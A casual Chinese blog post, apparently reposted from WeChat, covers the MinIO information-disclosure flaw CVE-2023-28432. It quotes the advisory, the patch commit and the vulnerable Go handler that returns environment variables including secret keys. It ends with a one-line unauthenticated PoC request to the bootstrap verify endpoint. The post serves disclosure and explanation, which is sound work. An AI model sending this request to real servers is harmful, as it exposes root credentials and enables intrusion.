CVE-2023-28432-信息泄露漏洞poc

在集群部署中，MinIO返回所有环境变量，包括MinIO_SSECRET_KEY

以及MINIO_ROOT_PASSWORD，导致信息泄露。

分布式部署的所有用户都会受到影响。建议所有用户尽快升级。（显然大部分单机穷鬼，比如我，不会受到此困扰）

当我看到推上图

来段英文找点高级感

https://github.com/minio/minio/security/advisories/GHSA-6xvq-wj2x-3h3q

Impact

In a cluster deployment, MinIO returns all environment variables, including MINIO_SECRET_KEY
and MINIO_ROOT_PASSWORD, resulting in information disclosure.

All users of distributed deployment are impacted. All users are advised to upgrade ASAP.

Patches

commit 3b5dbf90468b874e99253d241d16d175c2454077
Author: Harshavardhana <[email protected]>
Date:   Mon Mar 20 01:40:24 2023 -0700

    allow bootstrapping to validate internode tokens (#16853)

Workarounds

There are no known workarounds.

References

The vulnerable code:

// minio/cmd/bootstrap-peer-server.go
func (b *bootstrapRESTServer) VerifyHandler(w http.ResponseWriter, r *http.Request) {
  ctx := newContext(r, w, "VerifyHandler")
  cfg := getServerSystemCfg()
  logger.LogIf(ctx, json.NewEncoder(w).Encode(&cfg))
}

// minio/cmd/bootstrap-peer-server.go
func getServerSystemCfg() ServerSystemConfig {
  envs := env.List("MINIO_")
  envValues := make(map[string]string, len(envs))
  for _, envK := range envs {
    // skip certain environment variables as part
    // of the whitelist and could be configured
    // differently on each nodes, update skipEnvs()
    // map if there are such environment values
    if _, ok := skipEnvs[envK]; ok {
      continue
    }
    envValues[envK] = env.Get(envK, "")
  }
  return ServerSystemConfig{
    MinioEndpoints: globalEndpoints,
    MinioEnv:       envValues,
  }
}

一顿分析猛如虎

一看操作真实250

其实就是个未授权

今天加班，放poc，我先睡了

POST /minio/bootstrap/v1/verify HTTP/1.1

另外贴一张

究竟什么时候安服仔才可以站起来！！

原文始发于微信公众号（蓝猫Sec）：CVE-2023-28432-信息泄露漏洞poc